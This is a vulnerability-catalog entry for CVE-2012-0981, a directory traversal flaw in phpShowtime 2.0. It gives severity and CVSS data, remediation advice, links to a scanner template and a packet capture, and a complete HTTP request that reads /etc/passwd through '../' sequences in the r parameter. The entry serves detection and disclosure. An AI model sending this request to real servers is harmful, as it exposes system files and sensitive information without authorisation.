| Title | phpShowtime 2.0 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. |
| Remediation | Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.08793 |
| CVE ID | CVE-2012-0981 |
| CWE ID | CWE-22 |
| Tags | cve cve2012 phpshowtime edb lfi kybernetika vuln |
A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-0981.yaml
🦈 Packet Capture: ⬇️ Download cve-2012-0981.pcap
N/AN/A